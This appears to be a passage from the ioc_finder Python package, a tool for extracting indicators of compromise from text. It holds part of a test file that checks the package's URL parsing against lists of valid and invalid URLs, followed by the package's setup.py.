    'http://☺.damowmow.com/',
    'http://code.google.com/events/#&product=browser',
    'http://j.mp',
    'ftp://foo.bar/baz',
    'http://foo.bar/?q=Test%20URL-encoded%20stuff',
    'http://مثال.إختبار',
    'http://例子.测试',
    'http://उदाहरण.परीक्षा',
    "http://-.~_!$&'()*+,;=:%40:80%2f::::::@example.com",
    'http://1337.net',
    'http://a.b-c.de',
    'http://223.255.255.254',
]


def test_url_parsing():
    for url in VALID_URLS:
        iocs = find_iocs(url)
        try:
            assert len(iocs['urls']) == 1
            assert iocs['urls'][0] == url
        except AssertionError as e:
            print('failed on url: {}'.format(url))
            raise e


INVALID_URLS = [
    'http://',
    'http://.',
    'http://..',
    'http://../',
    'http://?',
    'http://??',
    'http://??/',
    'http://#',
    'http://##',
    'http://##/',
    '//',
    '//a',
    '///a',
    '///',
    'http:///a',
    'foo.com',
    'rdar://1234',
    'h://test',
    ':// should fail',
    'ftps://foo.bar/',
    'http://-error-.invalid/',
    'http://a.b--c.de/',
    'http://-a.b.co',
    'http://a.b-.co',
    'http://0.0.0.0',
    'http://10.1.1.0',
    'http://10.1.1.255',
    'http://224.1.1.1',
    'http://1.1.1.1.1',
    'http://123.123.123',
    'http://3628126748',
    'http://.www.foo.bar/',
    'http://www.foo.bar./',
    'http://.www.foo.bar./',
    'http://10.1.1.1',
]


def test_invalid_urls():
    for url in INVALID_URLS:
        iocs = find_iocs(url)
        assert len(iocs['urls']) == 0



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from setuptools import setup, find_packages

with open('README.md') as readme_file:
    readme = readme_file.read()

requirements = ['pyparsing', 'ioc_fanger', 'click']

setup(
    name='ioc_finder',
    version='3.1.0',
    description="Python package for finding and parsing indicators of compromise from text.",
    entry_points={'console_scripts': ['ioc-finder=ioc_finder.ioc_finder:cli_find_iocs']},
    long_description=readme,
    long_description_content_type="text/markdown",
    author="Floyd Hightower",
    author_email='',
    url='https://github.com/fhightower/ioc-finder',
    packages=find_packages(exclude=('tests', 'docs')),
    include_package_data=True,
    install_requires=requirements,
    license='MIT',
    zip_safe=True,
    keywords='iocs,indicators of compromise,parsing,finding,searching,threat intelligence,malware,threat hunting,observables,domains,domain names,asns,cidr,cidr ranges,ips,ip addresses,urls,email addresses,md5,sha1,sha256',
    test_suite='tests',
)
